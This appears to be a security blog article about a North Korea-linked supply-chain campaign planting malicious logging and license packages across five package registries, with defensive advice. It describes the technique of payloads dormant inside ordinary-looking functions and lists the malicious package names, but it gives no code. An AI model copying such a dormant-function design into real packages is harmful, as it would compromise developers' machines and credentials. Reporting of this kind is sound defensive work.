In the world of open-source software, trust is the ultimate currency. You npm install a logging utility, a debugging helper, or a license checker, and you move on—confident that the package does exactly what its name promises. But what if that innocent-looking dependency was quietly built in Pyongyang?
That nightmare became reality in early 2025. A North Korea-linked campaign codenamed Contagious Interview has now poisoned more than 1,700 packages across npm, PyPI, Go Modules, crates.io (Rust), and Packagist (PHP). The latest wave, detailed in early April 2026, shows the attackers expanding their factory-style operation into Go, Rust, and PHP while keeping the core playbook that has already delivered tens of thousands of downloads to unsuspecting developers.
The Campaign That Refuses to Die
Contagious Interview didn’t start with npm spam. It began as a classic social-engineering operation: North Korean operators (tracked as UNC1069, BlueNoroff, Sapphire Sleet, and Stardust Chollima) posed as tech recruiters on LinkedIn, Telegram, and Slack. They offered fake job interviews, sent “coding test” assignments hosted on polished GitHub repos, and lured Web3 and blockchain developers into downloading malicious starter templates.
The twist? Those templates contained hidden dependencies that pulled in the real payload.
By late 2024 the attackers realized they could skip the middleman. Why social-engineer one victim at a time when you can publish thousands of packages that millions of developers might pull in automatically?
The result: a relentless torrent of malicious uploads. Socket Security has tracked 1,733 malicious artifacts since January 2025, with fresh waves hitting every few weeks. Some packages were taken down, only to reappear under slightly different names days later. It’s not chaos—it’s a well-oiled malware factory.
How the Packages Actually Work (It’s Sneakier Than You Think)
Most supply-chain attacks trigger on install. These don’t.
The malicious packages are carefully crafted to look and behave like legitimate developer tools:
- npm examples: dev-log-core, logger-base, logkitx, pino-debugger, debug-fmt, debug-glitz
- PyPI: logutilkit, apachelicense, fluxhttp, license-utils-kit
- Rust (crates.io): logtrace
- Go & PHP: similarly themed license and logging utilities
The malicious code is not executed during installation. Instead, it hides inside normal-looking functions that match the package’s advertised purpose. In the Rust crate logtrace, for example, the payload lives inside Logger::trace(i32). A developer calls what they think is a harmless logging method, and boom—second-stage malware downloads.
These loaders (some named HexEval, others the newer XORIndex) fetch platform-specific payloads that deliver full-featured infostealers and RATs. The malware targets:
- Web browser credentials and cookies
- Password managers
- Cryptocurrency wallets
- CI/CD environment variables and tokens
One Windows variant even deploys AnyDesk for persistent remote access, takes screenshots, logs keystrokes, and exfiltrates data in encrypted archives. The goal is crystal clear: financial theft (crypto) and long-term espionage inside developer machines and corporate networks.
Why This Campaign Is Different
Most npm malware campaigns are opportunistic—typosquatting a popular package or sneaking in a backdoor once. Contagious Interview is industrial-scale and cross-ecosystem.
- It spans five major registries simultaneously.
- It uses “sleeper” packages that sit dormant until the right function is called.
- It leverages the exact same social-engineering infrastructure (fake personas, GitHub templates, Vercel-hosted C2) that the group has perfected over years of fake-job lures.
- It evolves: new loaders, steganography via Pastebin, multi-stage obfuscation, and rapid re-uploads after takedowns.
In short, this isn’t a one-off attack. It’s a persistent, state-backed supply-chain operation designed to turn the entire open-source ecosystem into an initial-access vector.
The Broader North Korean Playbook
This campaign doesn’t exist in isolation. The same actors (or closely affiliated ones) were behind the March 2026 Axios npm compromise that briefly backdoored a library with over 100 million weekly downloads. Different tactic (compromised maintainer account), same endgame: get code execution on developer laptops and corporate build servers.
The message from Pyongyang is loud and clear: if you build software, you are a target.
What You Should Do Right Now
- Audit your dependency tree – Tools like Socket, Dependabot, or npm audit can flag suspicious packages, but don’t rely on them alone. Look for anything with “log”, “debug”, “license”, or “utils” in the name that you don’t explicitly remember adding.
- Verify package authors – Especially for anything with fewer than a few thousand stars or recent creation dates.
- Use lockfiles religiously – And pin exact versions.
- Treat job-offer coding tests with extreme skepticism – If a recruiter asks you to clone a private GitHub repo or install a “test environment” package, assume it’s malicious until proven otherwise.
- Enable 2FA everywhere – npm, GitHub, PyPI, etc. The attackers have already shown they can compromise maintainer accounts.
- Monitor for anomalous network traffic – Especially outbound connections to raw IPs or unusual domains during builds.
The Bottom Line
Open source gave us incredible velocity. North Korean hackers are now using that same velocity against us.
Over 1,700 malicious packages. Tens of thousands of downloads. Five ecosystems. And the campaign is still accelerating.
The next time you run npm install, remember: somewhere in the dependency graph, a package might be waiting for the right function call to phone home to Pyongyang.
Stay paranoid. Verify everything. And maybe—just maybe—think twice before adding that shiny new logging utility.
The open-source ecosystem is only as secure as the least-vetted package in it. Right now, that bar is dangerously low.
Stay safe out there.